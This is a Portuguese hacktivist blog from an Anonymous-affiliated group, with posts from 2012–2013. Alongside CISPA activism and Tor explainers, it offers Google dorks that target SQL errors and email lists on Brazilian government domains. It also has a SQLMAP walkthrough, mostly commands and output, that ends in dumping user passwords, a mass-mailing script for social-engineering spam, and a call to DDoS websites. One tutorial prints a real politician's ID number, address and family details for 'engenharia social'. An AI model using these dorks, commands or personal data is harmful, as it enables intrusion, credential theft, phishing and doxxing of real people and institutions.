Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

segunda-feira, 22 de abril de 2013

A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá"

 Cyberativismo


 
A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá", que ocorrerá em nosso canal no Raid Call.
 
A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá", que ocorrerá em nosso canal no Raid Call.




Hora de início: 21hs (horário de Brasília).


Palestrante: Draven.


Duração: 40 minutos.


ID: 5187397








Contamos com a presença de todos.


Nós somos Anonymous.


Somos uma legião.


Nós não perdoamos.



domingo, 21 de abril de 2013

Blackout da Internet - Dia 22 de Abril de 2013

 Blackout da Internet - Dia 22 de Abril de 2013 

 Blackout da Internet - Dia 22 de Abril de 2013

 O que é CISPA ??  

O CISPA permite que empresas privadas compartilhem uma ampla gama de dados de clientes entre si e com as agências governamentais, afirmam os grupos de defesa da privacidade.

Os defensores do projeto, no entanto, argumentaram que é necessária uma legislação para promover um melhor compartilhamento de informação sobre ciberataques ativos, resultando em uma melhor defesa de redes norte-americanas. A lei federal atualmente proíbe que as agências de inteligência compartilhem informações classificadas sobre ameaças cibernéticas com empresas privadas.
Uma ampla gama de empresas de tecnologia e grupos comerciais manifestou apoio à CISPA. "Todos os dias, os provedores de serviços de Internet veem e respondem a um crescente número de ameaças virtuais que podem causar prejuízo econômico significativo e violações de privacidade pessoal", disse a Associação Nacional de Telecomunicações em um comunicado. "[O CISPA] permite que empresas privadas e governo compartilhem informações que irão aumentar a proteção de nossa infraestrutura de Internet, dos consumidores e da economia dos Estados Unidos."
O grupo de direitos digitais Free Press disse que está desapontado com o voto. "O CISPA ainda destruirá as nossas leis de privacidade e acabará com a liberdade de expressão online", disse o diretor de política Matt Wood, por e-mail. "Precisamos garantir que empresas removam informações pessoais irrelevantes quando compartilham nossos dados, e que essas empresas possam ser responsabilizadas por ignorar e abusar das liberdades civis dos usuários de Internet."

 

O Anonymous Norte Americano convoca para que no dia 22 de Abril façamos parte da Op Blackout da Internet com o objetivo de chamar a atenção do Senado norte americano para o veto da CISPA (ato que permitirá que Facebook, Twitter e Google forneçam seus dados confidenciais para o Governo Norte Americano e, provavelmente, empresas com fins lucrativos).
Abaixo o vídeo e sua transcrição. Dado o tempo curto que temos para divulgar segue sem legendas... nos trazendo à luz da regra que "a comunicação há de ser efetiva não necessariamente própria."

O que é Leitura fria ???

 O que é  Leitura fria ???

 

 O que é  Leitura fria ???

Muito usada por engenheiro sociais.


Leitura fria é um conjunto de técnicas que buscam avaliar, de forma aprofundada ou superficial, uma pessoa ou um ambiente físico; principal ferramenta ao auxílio de diversas profissões ligadas as características comportamentais e psicológicas do ser humano.
A história da leitura fria está ligada diretamente ao empresário norte americano, Phineas Taylor Barnum, conhecido por P.T Barnum. É considerado por muitos profissionais que utilizam a leitura fria como ferramenta de trabalho o "pai" da leitura fria. P.T Barnum utilizou-a em suas atividades empresarias com um nível considerável de acerto.
A leitura fria e suas técnicas têm como base o factor do Raio-X, mapeamento de características comportamentais e psicológicas de uma pessoa.
O factor Raio-X não só avalia características comportamentais e psicológicas, MAS também ambiente fisico, objetos sendo ferramentas ou não, possibilitando uma maior flexibilidade na leitura fria.
Muitos especialistas definem a leitura fria como uma ferramenta utilizada por todos com um único objetivo: conhecer o desconhecido.
As principais técnicas e mais famosas de leitura fria são: - Linguagem corporal (leitura fria através dos gestos e micro-gestos, cocientes e inconscientes da pessoa); - Grafologia (leitura fria através da grafia da pessoa); - Voz (tonalidade, volume, português...); - Nome (é feita uma leitura através do nome da pessoa);

quinta-feira, 18 de abril de 2013

Espalhe: #EndCISPA Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA)


Espalhe: #EndCISPA Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA)



Espalhe: #EndCISPA
 
Assine: https://action.eff.org/o/9042/p/dia/action/public/?action_KEY=9137

Sabe o e-mail que você enviou hoje? Ou aquela mixtape que mandou pros amigos? Ou mesmo o compartilhamento de uma imagem que você fez no Facebook? Tudo isso está agora sob sério risco de ser vigiado pelo governo americano. Isso porque nesta quarta, 17, na surdina, o Congresso americano passou a Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA) 
que:
Permite que as empresas (qualquer empresa) coletem informações particulares de um usuário e enviem todas essas informações para o governo americano e setores privados interessados no que parece ser uma tentativa de “conter” crimes online.

Em outras palavras, a nossa liberdade de internet – e isso diz respeito a QUALQUER pessoa do mundo – está ameaçada por uma lei americana que pretende vigiar todos os nossos passos e usar isso sabe-se lá com que intenções.

quarta-feira, 17 de abril de 2013

HoneyMap monitoramento de ataques hackers


HoneyMap é um mapa do mundo em tempo real, Que visualiza ataques capturados por honeypots do projeto Honeynet. Marcadores vermelhos no mapa representam os atacantes, marcadores amarelos são os alvos (sensores honeypot).


HoneyMap é um mapa do mundo em tempo real, Que visualiza ataques capturados por honeypots do projeto Honeynet. Marcadores vermelhos no mapa representam os atacantes, marcadores amarelos são os alvos (sensores honeypot).

Link:http://map.honeynet.org/

terça-feira, 19 de março de 2013

INFORMATIVO - Lacking Faces

INFORMATIVO -  Lacking Faces


A Lacking Faces é um grupo de ativismo segundo os princípios da ideia Anonymous,
de maneira que nosso papel é de divulgação desta ideia e conscientização social.
Nosso grupo não é vinculado a atividades hackers e por esta nomenclatura
não se auto-de
nomina.
Vale ressaltar, também, que,
a Lacking Faces não é responsável pelos arquivos disponibilizados
em qualquer de nossos setores.
Cada arquivo é de responsabilidade do membro que o postou.
Os temas propostos para estudos nos meios digitais dizem respeito à
segurança da informação e dos usuários.
Nenhuma das habilidades aqui aprendidas são colocadas em prática pelo grupo,
de forma que a responsabilidade é unicamente do individuo que venha a realizar.
Apartir de hoje LackingFaces apenas ira se dedicar ao ativismo e concientização da ideia Anonymous


Grupo de estudos:https://www.facebook.com/groups/GdELackingFaces/

segunda-feira, 18 de março de 2013

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Dork: site:org.br | site:gov.br & ('800a000d' | "MySQL Error") & inurl:*id*= -forum -forums -xoops -portal -tutorial

sexta-feira, 15 de março de 2013

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.


Script spammer para envio em massa, diferenciado pois vai dar uma grande consistência na sua engenharia social
Vinculado com banco de dados Mysql suas msg chegaram de forma dinâmica
Com os seguinte dados
---------------------------------------
nome,email,cargo,end,data
---------------------------------------
ONDE ne sua engenharia html ficara da seguinte forma com os parâmetros.
Nome do cliente: NOME_ENG

Email do
cliente: EMAIL_ENG

Cargo do
cliente: CARGO_ENG
Data do envio que você determinou no campo banco: DATA_ENG


Esses dados serão filtrados e trocados pelos os do banco de dados.
A function MAIL(); deve esta devidamente configurada.

Na function conectart() é definido os dados de acesso do BD.
Configuração de envio.
$GLOBALS['assunto'] = "O assunto usado!";
$GLOBALS['email_remetente'] =  "Remetendete.com.br";
$GLOBALS['eng_arq'] = "seuarquivo.html";

Exemplo de arqvui

Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do cliente: CARGO_ENG

Data do envio que você determinou no campo banco: DATA_ENG


Modo de uso

php script.php








quinta-feira, 14 de março de 2013

Introdução Grupo de estudos Lacking Faces

A proposta da Lacking Faces é a de promover ações para um mundo melhor, dentro dos princípios da ideia Anonymous, sendo assim, oferece vários ambientes virtuais para que seus membros compartilhem informações e desenvolvam seus conhecimentos para que possam realizar seu ativismo com seriedade e eficiência.
Nesta página estão todas as informações necessárias para que os membros (ou futuros membros da Lacking Faces compreendam a rotina do grupo de estudos, suas regras e seus princípios. Além disso, é possível também a todos terem acesso aos diferentes setores da Lacking Faces.
Por fim, é de grande importância que todos tenham ciência do que consta nos links apontados abaixo, para zelar pela qualidade dos trabalhos e da aprendizagem de todos.
Contem com nossa equipe de moderadores, e vamos juntos lutar por um mundo mais justo.
Viva Anonymous.
Viva Lacking Faces.
Somos uma legião.
Link de acesso: http://lackingfaces.net/introducao/

sábado, 9 de março de 2013

Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP

SQLMAP é a uma ótima ferramenta de injeção SQL que eu já vi: feito em python, Opensource, e os comandos vão de acordo com a necessidade do invasor.
 Vamos intender como funciona á URL

 URL: https://www.siteteste.com.br/index.php?id=1 
https :[Protocolo usado]
 www.siteteste.com.br :[Domínio alvo]
 index.php :[Arquivo php onde tem os include que fazem a consulta]
 ?id :[Parâmetro GET que recebe valores para que assim faça uma consulta no BD ou validação.]
1 :[Valor que será passado]
Código:

index.php?id=1
 -------------------------------INDEX.PHP-------------------------

  1. if($_GET['id']){
  2. $id = $_GET['id']; // Capturando valor GET e inserindo na variavel $id;

  3. require_once('include/function.php'); // Inserindo arquivo function no código atual.

  4. }?>

  5. Teste SQLMAP
  • pesquisa("noticias",$id);
  • ------------------------------------------------------------------------
    Agora vamos entender como funciona o arquivo function.php

    ----------------------------FUNCTION.PHP-------------------------

    1. function pesquisa($tabela,$id){ //Noma da function

    2. $con = mysql_connect("localhost","root","123456"); // editar host, usuario, senha

    3. $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}"; //concatenando valores, web é o banco de dados.

    4. $query = mysql_query($sql); //executando select

    5. if (!$query) {  die ('ERRO!:' . mysql_error()); }//Se der algo errado.

    6. while($escrever=mysql_fetch_array($query)){ //Agora vamos percorrer o array.

    7.     echo "$escrever['NOTICIA']
      ";
    8. //Imprimindo valor atual do campo noticia

    9. }

    10.  mysql_close($con); // Fechando conexão!
    11. ?>

    ----------------------------------------------------------------------------
    Codigo vulneravel pois em nem um momento é feito o filtro adequado do parâmetroID assim possibilitando a modificação do sql de busca. 
    Digamos se na get_['id'] o usuario inserir o seguinte valorindex.phpid?=-1 order by 50; 
    Se a tabela noticias tiver menos que se 50 colunas ele vai retorno falando que não existe 50 colunas.Assim vai, o Sqlmap faz todo trabalho de injeção identificando quantidade de colunas, a versão do banco.Se as senhas estiverem em md5 o sqlmap já tem um wordlist.


    Dentro do codigo ficaria assim.
    $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}";
    Valor modificado "SELECT * FROM web.noticias WHERE id=-1 order by 50;"

    Agora vamos para o sqlmap

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 --dbs -p id -v 3 --proxy="http://localhost:8118"

    Não explicarei comandos sqlmap favor pesquisar.

    Pelo código criado o site esta vulnerável e retorna os seguintes valores.Banco de dados:

    [ * ] web
    [ * ] information_schema

    Agora queremos saber quais as tabelas do banco de dados "web".

     ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" --tablesTabelas:
    [ * ] usuario
    [ * ] noticias
    [ * ] smtp
    [ * ] blog


    Neste momento precisamos saber quais as colunas da tabela usuario.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario --columns

    +--------+--------------+
    | Column | Type |
    +--------+--------------+
    | ID | int(11) |
    | login | varchar(255) |
    | senha | varchar(255) |
    +--------+--------------+

    Logico que queres saber os usuario e senhas do site.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario -C "ID,login,senha" --dump


    Vamos lá galera estudar não basta saber os comandos.Tem que é o funcionamento.

    Grupo de Estudos Lacking Face &Anonymous Brasil.

    sexta-feira, 8 de março de 2013

    Dork busca email

    Dork  email .governo

    Dork  email .governo


    Dorkeiros de plantão que adoram list emails...
    Dorks para emails-list relacionado ao governo brasileiro.

    intext:@camara.leg.br ext:txt

    intext:@*.leg.br or intext:@*.gov.br ext:txt

    Alterando o formato ext: outros formatos.
    Exemplo de uso:ext:log ou ext:sql ou ext:ini

    Pacote de estudos INURL!


    Para fanáticos em DORKS!

    Para fanáticos em DORKS!

    INTRODUÇÃO Usando o Google para se defender de ataques:

    http://blog.inurl.com.br/2011/01/google-use-melhor-seu-tempo-nas.html

    Google Use melhor seu tempo nas pesquisas:

    http://blog.inurl.com.br/2011/01/introducao-usando-o-google-para-se.html

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos:

    http://blog.inurl.com.br/search/label/Mundo%20INURL%20Conceito

    Google operadores guide:

    http://blog.inurl.com.br/2010/08/google-operadores-guide.html#_

    LF DORK SCANNER 1.0

    https://www.facebook.com/groups/GdELackingFaces/579968352015846


    Grupo de Estudos Lacking Face &Anonymous Brasil
    Acesse:https://www.facebook.com/groups/GdELackingFaces/

    quinta-feira, 7 de março de 2013

    #OPprojetodestruiçãopedofiliazero Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.

    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL. Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet. Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo.  #OPprojetodestruiçãopedofiliazero


     PROJETO DESTRUIÇÃO


    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.
    Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet.
    Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo.

    #OPprojetodestruiçãopedofiliazero

    No dia 08 de março de 2013 , as 19:00 Horário de Brasília venha juntar-se a Nós, Vamos acabar com esses porcos que acabam com a inocência de crianças, e que publicam e comercializam vídeos e fotos.
    Esta OP faz parte de um projeto contra a pedofilia, (https://www.facebook.com/groups/projetodestruicaolackingfaces/).
    Peço que todos divulguem aos quatro ventos, para atacarmos estes porcos, vamos atacar com todas as forças, desde DDos, até mesmo exposed e denuncias dos ADM’S destes sites.
    Iremos atacar massivamente estes sites vergonhosos, usando de todas as informações e ferramentas possíveis.
    A exposição dos nomes destes sites informados pelos usuários serão para fazer dentro da OP apenas no dia dos ataques.
    Criaremos pânico entre esses porcos, pois saibam que eles comunicam-se entre eles.
    EVENTO:
    https://www.facebook.com/events/122762874572946/

    quarta-feira, 6 de março de 2013

    Index of / Wireshark 6 pdf tutoriais.

    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Index of /
    http://www.eee.ufg.br/~cgalvao/redes/lab/EEEC -
    Escola de Engenharia Elétrica e de Computação - UFG
    EMAIL.pdf 29-Nov-2012 23:59 101K
    Wireshark_IP.pdf 17-Jan-2013 23:53 253K
    Wireshark_TCP.pdf 17-Jan-2013 16:29 360K
    Wireshark_UDP.pdf 17-Jan-2013 23:46 42K
    tutorial-wireshark.pdf 20-Nov-2012 20:19 716K
    wireshark-dns.pdf 20-Nov-2012 20:22 345K
    wireshark-http.pdf 20-Nov-2012 20:22 200K

    Grupo de Estudos Lacking Face &Anonymous Brasil

    Documentos para estudo FTP publico registro.br


    Documentos para estudo FTP publico registro.br


    Conferencias web
    ftp://ftp.registro.br/pub/
    ftp://ftp.registro.br/pub/w3c/
    ftp://ftp.registro.br/pub/w3c/wwwbrasil2009/
    ftp://ftp.registro.br/pub/w3c/Conferencia_Web_10-2010/
    ftp://ftp.registro.br/pub/forumdainternet/


    Inúmeros PDF de treinamento voltados para TI - SEC.
     ftp://ftp.registro.br/pub/gts/

    Agora só garimpar e baixar.
    Usuários Linux já sabem que um wget é uma boa escolha.

    Fonte:
    Grupo de Estudos Lacking Face &Anonymous Brasil 
     https://www.facebook.com/groups/GdELackingFaces/doc/580825741930107/

    domingo, 3 de março de 2013

    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl


    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl
    LF DORK SCANNER 1.0

    Motor de busca: UOL - personalizada do google.
    Parâmetros de pesquisa: Dorks.
    Feito em perl.
    Exemplo de uso: inurl:php?id= noticias site:br

    # LackingFaces { http://lackingfaces.net/ }
    # Escaner de SQLI para fins educacionais,
    # Não nos responsabilizamos pelo mau uso do mesmo.

    quinta-feira, 28 de fevereiro de 2013

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    Navegador web simples feito em C#
    Campos: combo com motores de busca para escolher
    Textbox para pesquisa botão de pesquisa e de controle.

    Fonte:Grupo de Estudos Lacking Face &Anonymous Brasil.

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!

    LackingMysql Consulta em BD Mysql programa + fonte

    LackingMysql Consulta em BD Mysql programa + fonte

    Feito em C#


    Conecta em bancos de dados mysql.
    Campos, Servidor,Login,Senha,SQL

    Feito para estudantes de programação C#

    Necessita: Microsoft .NET Framework 4


    Link Download:https://www.facebook.com/groups/GdELackingFaces/577583682254313/

    Créditos Grupo de Estudos Lacking Face e Anonymous Brasil

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!

    sexta-feira, 15 de fevereiro de 2013

    Dorks buscar sites do governo brasileiro com erros sql.

    Dorks buscar sites do governo brasileiro com erros sql.

    Dork: site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"

    Explicativo:

    site:gov.br = restringir nossa busca somente no domínio gov.br, mas tambem pode ser usado para outros domínios.
    & =  Operador logico.
    intext:"SQL syntax" =  Procurar no texto interno da pagina o conjunto de palavras "SQL syntax".
    +inurl:php?=  = "+" força o motor de busca pesquisa a determinada palavra ou operador, inurl:palavra = pesquisar na URL da pagina.
     - = Retira da pesquisa assim facilita o filtro.
     
     

    quarta-feira, 2 de janeiro de 2013

    Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

    Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

    Recentemente trabalhando com minhas máquinas virtuais no Virtualbox 3.2.4, da Sun/Oracle, me deparei com a seguinte mensagem de erro abaixo ao tentar executar qualquer uma máquina virtual:
    Imagem Erro: Kernel driver not installed (rc=-1908)
    Após algumas varreduras no Oráculo (Google), cheguei a seguinte solução quer compartilho com vocês:
    1º Passo:
    Verificar através do comando “cat /etc/group” se o seu usuário pertence ao grupo de usuários vboxusers. Caso não, execute o comando abaixo:
    sudo addgroup usuário vboxusers
    2º Passo:
    Executar o comando da mensagem de erro como usuário root.

    sudo /etc/init.d/vboxdrv setup
    3º Passo:
    Da permissão de leitura, escrita e execução ao o usuário root e ao grupo de usuários da pasta /dev/vboxdrv

    sudo chmod 770 /dev/vboxdrv
    Pronto! Agora você já pode voltar a brincar com as suas máquinas virtuais. ;) 

    Fonte:http://phpimenta.wordpress.com/2010/06/20/corrigindo-erro-kernel-driver-not-installed-rc-1908-do-virtualbox-3-2-4-no-ubuntu-10-04/


    Se nada disso der certo.
    Tente esses

    1 -

    sudo dkms install virtualbox/4.1.2
    
    
    2-Tentar instalar leitor de cabeçalhos linux:
    sudo apt-get install linux-headers-$(uname -r)

    sábado, 29 de dezembro de 2012

    O Braço do Wikileak no Brasil.

    WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil
    Missão
    WikiLeaks, publicados por Sunshine Press, é uma organização sem fins lucrativos financiada por defensores dos direitos humanos, jornalistas investigativos, tecnólogos eo público em geral.
    Através de seu apoio que temos exposto injustiça significativa em todo o mundo combatendo-off com sucesso mais de 100 ataques legais no processo. Nosso trabalho produz reformas diariamente e é o destinatário de vários prêmios, incluindo o Índice de 2008 sobre censura Economista-Liberdade de Expressão Award, bem como a Anistia Internacional 2009 New Media Award. Nós não aceitamos governo ou financiamento corporativo. Nós nunca ter comprometido uma fonte.
    Informações gerais
    WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil WikiLeaks - Abrir os governos.
    Descrição
    Página oficial do Facebook. WikiLeaks foi fundado por Sunshine Press para disseminar documentos, fotos e vídeos secretos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil

    Informações de contato

    domingo, 23 de dezembro de 2012

    Momento Wikipédia! O que é TOR?

    Momento Wikipédia!  O que é TOR?


    Momento Wikipédia!
    O que é TOR?

    The Onion Router, também conhecido pela sigla Tor, é uma rede de computadores distribuída com o intuito de prover meios de comunicação anônima na Internet. A maioria das distribuições GNU/Linux disponibilizam pacotes do Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e Mac OS. A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os roteadores da rede são computadores de usuários comuns rodando um programa e com acesso web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que está acessando a web.

    Funcionamento

    O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um proxy socks 5 para este. É fornecido um bind, geralmente na porta 9.050 local da máquina. Em seguida, os programas (web browser, emule etc.) devem ser configurados para usar um servidor proxy socks 5 e apontados para o endereço localhost (127.0.0.1). Às vezes, ele também possui um navegador incluído, tal como Aurora e Mozilla Firefox.

    A partir daí, o Tor vai rotear todo o tráfego do computador através de túneis http da rede Tor até o destino, na rede "convencional". Se o usuário entrar em site do tipo http://myip.is/ e http://meuip.com.br/, vai ver que o seu endereço vai aparecer diferente do seu endereço real (anonimato). O endereço que vai aparecer é o endereço do nó Tor por onde ele saiu da rede Tor para a rede "convencional". O tráfego é roteado por vários nós Tor, o que pode deixar o acesso bem lento, às vezes.

    Ou seja, para o servidor acessado você terá o endereço IP de um do nó de saída, como a rede Tor tem uma topologia caótica (aleatória), não se pode escolher o IP final ou de qual região da rede será. Por exemplo, usando a rede Tor você não pode escolher ter um IP de uma máquina localizada em um país ou região específica.

    Ainda é possível aumentar a rede, abrindo seu computador para uso de outros usuários do Tor.

    Há uma espécie de domínio com terminação .onion, acessível apenas pelo Tor. Páginas com este domínio são chamadas de Deep Web.
    Características

    Uma observação importante: o usuário deve ter cuidado se for usar a rede Tor para tráfegos não-criptografados, pois a segurança em nível de transporte que o Tor implementa é só até o nó Tor de saída (exit node). Desse ponto até o destino da rede "convencional", o tráfego é encaminhado da maneira original como foi entregue ao Tor na máquina local. Então, se o usuário configurar o seu Tor para operar como servidor de relay, terá a possibilidade de logar o tráfego original de todas as pessoas que estiverem passando por túneis cujo nó de saída seja o seu nó Tor.

    Tor é um pacote de ferramentas para organizações e pessoas que desejam mais segurança na Internet. Com ele, o tráfego de dados na navegação de mensageiros instantâneos, IRC, navegadores, SSH e outros aplicativos que usam o protocolo TCP se tornará anônimo. Ele também fornece uma plataforma na qual os desenvolvedores podem construir novos aplicativos baseados no anonimato, segurança e privacidade. O tráfego é mais seguro ao se usar Tor, pois as comunicações são ligadas através de uma rede distribuída de servidores, chamados roteadores onion (onion router), um projeto que visa à proteção e ao direito do usuário de permanecer anônimo na Internet.

    Ao invés de direcionar a rota da fonte para o destino, os pacotes de dados da rede Tor assumem um caminho aleatório através de vários servidores que cobrem os traços para que nenhum observador inoportuno saiba de onde vieram e para onde vão os dados. O propósito dessa tecnologia é proteger os usuários da Internet contra a "análise de tráfego", uma forma de monitoramento de rede que ameaça o anonimato e a privacidade, atividades comerciais confidenciais e relacionamentos, além da segurança de Estado.

    A análise de tráfego é usada diariamente por corporações, governos e indivíduos que desejam manter um banco de dados do que fazem pessoas e organizações na Internet. Ao invés de procurar o teor das comunicações, a análise de tráfego rastreia de onde vêm e para onde vão os seus dados, assim como quando foram enviados e a quantidade.

    Por exemplo, companhias usam a análise de tráfego para armazenar um registro de que páginas da Internet o usuário visitou para construir um perfil dos seus interesses. Suponha-se que uma indústria farmacêutica use essa análise ao pesquisar um nicho de mercado, monitorando o website do concorrente para saber quais produtos lhe interessam. Uma lista de patentes pode ser consultada, rastreando todas as buscas feitas.

    Tor dificulta a análise de tráfego ao evitar o rastreamento de dados online, permitindo que o usuário decida se deseja se identificar ou não ao se comunicar. A segurança é aperfeiçoada enquanto mais pessoas se voluntariam a executar servidores. Parte do objetivo do projeto Tor é fazer um experimento com o público, ensinando as melhores saídas para obter privacidade online.
    Opera Tor

    Opera Tor é um programa de computador que combina o programa de anonimidade Tor com o navegador Opera e deve ser executado diretamente de uma mídia portátil, como um pen drive.

    Por ser executável diretamente de uma mídia portátil, Opera Tor não precisa nem mesmo ser instalado no computador, de tal forma que seu uso não altera em nada na configuração do sistema, dos outros navegadores ou arquivos. Programas baseados em Tor tem sido usado por internautas de países submetidos a ditaduras para burlar a censura do governo, uma vez que o IP do internauta é totalmente mascarado. Sendo assim, as páginas visitadas não poderão reter informação do internauta. Apenas o provedor do usuário terá acesso aos dados e detalhes da navegação.

    No âmbito do estudo da Segurança da Informação pode-se questionar, porém, se governos e desenvolvedores não teriam acesso aos dados navegados, mas até hoje não houve nenhuma evidência neste sentido. De qualquer forma, esta tem sido uma ferramenta para internautas de diversos países acessarem a internet sem censura e jornalistas divulgarem notícias desagradáveis a governos em Estados ditatoriais, sendo uma verdadeira arma de informação a favor da democracia.

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos


    *Conceito INURL.
    *Principais operadores.
    *Pesquisa MD5 e outras criptografia.
    *Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".


    *Conceito INURL:

    Algumas dicas que servem para a maioria dos buscadores, incluindo o Google,
    È usar apenas palavras chaves na sua busca, em vez de buscar, por exemplo, Golpe do Estado busque
    Por Golpe Estado. O Google e alguns poucos outros tem uma melhor vantagem, ele faz um filtro de busca,
    Retirando informações pequenas, como de, da/do, com, dessa forma não é totalmente necessário fazer o filtro
    Manualmente, porém a pesquisa pode se tornar um pouco mais rápida.
    "Ou seja para fazer uma pesquisa não precisa digitar uma pergunta na barra de pesquisa."

    Exemplo
    "Seu intuito é encontrar um sites com musicas da banda Metallica"

    - ERRO: baixar musicas da banda Metallica: De fato vem sites com o conteúdo citado porem vem um resultado meio sujo.

    "Devemos usar o poder das palavras chaves"

    - Certo: musicas Metallica mp3 ou somente Metallica mp3: O resultado fica um pouco mais limpo pois vai direto para blogs
    referente downloads.

    *2 - Reforçando a pesquisa utilize: Aspas duplas, digamos queres achar uma pessoa pelo nome
    Dados que você tem Nome: zé dirceu

    Somente isso,como inicia pesquisar no Google "ZÉ DIRCEU" o resultado não mudou muito,com aspas.
    Agora vamos ser um pouco mais inteligentes é usar em vez de zé vamos usar "JOSÉ DIRCEU",
    Pois zé e abreviação de zé digamos assim.
    Vão falar nossa não mudou muito, lembra que eu falei dos poderes de uma palavra chave vamos combinar
    "JOSÉ DIRCEU" com algo comum de qualquer brasileiro

    pesquisa: "JOSÉ DIRCEU" +cpf
    +cpf = Obriga o o google a pesquisa a palavra CPF junto com termo "JOSÉ DIRCEU",
    assim tú garante que o Google inclua CPF na pesquisa
    Resultado:
    JOSÉ DIRCEU DE OLIVEIRA E SILVA, brasileiro, casado, advogado, CI
    n.º 3.358.423 SSP/SP, nascido em 16/03/1946, filho de Castorino de
    Oliveira e Silva e Olga Guedes da Silva, residente na SQS 311, Bloco I,
    apto. 302, Brasília/DF;

    "Com isso já é possível gerar uma engenharia social mais isso em outro documento."

    --------------------------------------------------------------------------------------------------------------------------------------

    *Principais operadores.

    // "ASPAS"
    Pesquisar uma palavra ou frase exata: "consulta de pesquisa" Use aspas.
    ex:[ "olha que coisa mais linda" ]


    // -EXCLUIR
    Excluir uma palavra -pesquisa: Adicione um hífen (-) antes da palavra para excluir.
    ex:[ pandas -site:wikipedia.org ]   2 [ velocidade jaguar -carro ]     

    Incluir palavras similares: ~consulta Normalmente, algumas palavras da consulta original poderão
    ser substituídas por sinônimos. Adicione um til (~)
    ex:[ fatos ~alimentares ] inclui resultados para "fatos nutricionais"


    // SITE:gov.br
    Pesquisar em um site ou domínio: site: consulta Inclua "site:" para procurar informações em um único website.
    ex:[ poupa tempo site:sp.gov.br ]    

    // "CORINGA*BATIMAN"
    "Preencher" os espaços: consulta * consulta Use um asterisco (*) dentro da consulta como espaço
    reservado para termos desconhecidos ou "curinga".
    ex:[ "quem tem * vai a Roma" ]          

    // OR
    Pesquisar por uma das palavras consulta OR consulta: Para pesquisar por páginas que contenham apenas uma palavra
    entre várias palavras, inclua OR.
    ex:[ sede olimpíadas 2014 OR 2018 ] 2 [ "copa do mundo 2014" OR "olimpíadas 2014" ]  

    // ..INTERVALO
    Pesquise por um intervalo numérico número..número:Separe os números por dois pontos (sem espaços) para ver
    resultados dentro do intervalo especificado de datas.
    ex:[ câmera $50..$100 ] 2 [ vencedores copa do mundo ..2000 ]  

    // FILETYPE OU EXT
    Pesquisa por arquivos determinando a extensão ext: ou filetype: Exemplo, apostilas ext:pdf ou filetype:pdf,
    "introdução mysql" ext:pdf


    // INTEXT:
    Pesquisa de texto especifico intext:"Machado de Assis".

    //INTITLE:
    Termo do html Machado de Assis livros do valor X ou Y
    Pesquisa por texto especifico no title de sites intitle:"Machado de Assis livros"



    Esses são os comandos básicos para sobrevivência em pesquisa.
    --------------------------------------------------------------------------------------------------------------------------------------

